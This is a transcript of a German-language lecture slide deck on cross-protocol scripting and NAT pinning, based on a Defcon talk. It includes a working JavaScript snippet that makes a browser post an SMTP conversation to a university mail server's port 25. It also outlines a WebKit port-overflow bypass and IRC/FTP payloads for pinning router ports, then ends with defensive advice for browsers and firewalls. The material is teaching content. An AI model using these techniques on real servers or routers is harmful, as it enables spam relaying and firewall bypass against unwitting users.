Pinning and Candle Lighting Ceremony April 2014 Pinning and ...
IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein.
-
Upload
hartwin-dresch -
Category
Documents
-
view
119 -
download
2
Transcript of IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein.
![Page 1: IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein.](https://reader036.fdocuments.net/reader036/viewer/2022062307/55204d8149795902118d4910/html5/thumbnails/1.jpg)
IT Security
Cross Protocol Scripting &NAT Pinning
Emanuel Klein
![Page 2: IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein.](https://reader036.fdocuments.net/reader036/viewer/2022062307/55204d8149795902118d4910/html5/thumbnails/2.jpg)
Motivation
• Defcon 18 Videos auf Youtube• How i met your Girlfriend• Von Samy Kamkar• http://www.youtube.com/watch?v=fEmO7wQKCMw
• Inhalt:• PHP 160 Bit Session Variable Reduktion auf 40 Bit• Cross Protocol Scripitng (XPS)• NAT Pinning• Webkit Integer overflow• Geolocation via XXXSS
![Page 3: IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein.](https://reader036.fdocuments.net/reader036/viewer/2022062307/55204d8149795902118d4910/html5/thumbnails/3.jpg)
Cross Protocol Scripting (XPS)
HTTP Newline Protocol
Browser ist HTTP Client \n Client
HTTP Server auf Port 80, 443 ,8080, ????
Andere Newline Protokolle SMTP
FTP
IRC
![Page 4: IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein.](https://reader036.fdocuments.net/reader036/viewer/2022062307/55204d8149795902118d4910/html5/thumbnails/4.jpg)
Der Browser als beliebiger Client
SMTP Zum versenden von Spam
IRC Zum versenden von Spam
-> NAT Pinning
FTP -> NAT Pinning
![Page 5: IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein.](https://reader036.fdocuments.net/reader036/viewer/2022062307/55204d8149795902118d4910/html5/thumbnails/5.jpg)
Der Javascript Client
doc = document.createElement(“form“);
doc.setAttribute(“name“,“x“);
doc.setAttribute(“method“,“POST“); //GET Funktioniert natürlich nicht
doc.setAttribute(“action“,“http://mail.fhstp.ac.at:25/“); //Server+Port
doc.setAttribute(“enctype“,“multipart/form-data“); //erhält newlines!
payload = document.createElement(“textarea“);
payload.setAttribute(“name“, “C“);
// Der eigentliche Inhalt
data = “HELO\nMAIL FROM:<[email protected]>\nRCPT TO:<[email protected]>\nDATA\nSubject: Raketenfuzzys\nKeep up the good work!\n.\n\nQUIT“;
payload.setAttribute(“value“, data);
payload.innerHTML = data;
payload.innerText = data;
doc.appendChild(palyoad);
document.body.appendChild(doc);
doc.submit(); //Abschicken
![Page 6: IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein.](https://reader036.fdocuments.net/reader036/viewer/2022062307/55204d8149795902118d4910/html5/thumbnails/6.jpg)
Demo
![Page 7: IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein.](https://reader036.fdocuments.net/reader036/viewer/2022062307/55204d8149795902118d4910/html5/thumbnails/7.jpg)
Webkit Integer Overflow
IRC Port 6667 6667 = 0001 1010 0000 1011 72203 = 1 0001 1010 0000 1011
Browser check: If port != 6667 then connect(hostname, port)
TCP/UDP Port nur 16 Bit groß 17. Bit wird einfach abgeschnitten!
![Page 8: IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein.](https://reader036.fdocuments.net/reader036/viewer/2022062307/55204d8149795902118d4910/html5/thumbnails/8.jpg)
NAT Pinning
SOHO Router und Firewalls sind ALGs
Inspizieren und Interpretieren Layer 7 Payload
Beispiele:
IRC/DCC:
PRIVMSG target :DCC target $IP $PORT
Netfilter IRC Conntrack
FTP PORT Command
PORT ip1.ip2.ip3.ip4.p1.p2
?
Implementationsabhängig!
![Page 9: IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein.](https://reader036.fdocuments.net/reader036/viewer/2022062307/55204d8149795902118d4910/html5/thumbnails/9.jpg)
Was lernen wir daraus
Browser:
Aktuellen Browser verwenden (patchen, auch Browser!)
NoScript?
Firewall:
Regeln überdenken
Brauche/habe ich ALG Funktionalität aktiviert?
Host based Firewalls
![Page 10: IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein.](https://reader036.fdocuments.net/reader036/viewer/2022062307/55204d8149795902118d4910/html5/thumbnails/10.jpg)
Vielen Dank für Ihre Aufmerksamkeit!